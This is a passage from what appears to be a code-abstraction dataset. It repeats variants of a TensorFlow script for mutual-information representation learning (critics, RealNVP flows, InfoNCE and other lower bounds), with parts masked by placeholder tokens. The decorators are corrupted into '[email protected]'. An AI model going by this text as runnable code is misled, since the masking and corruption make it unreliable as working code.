hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = 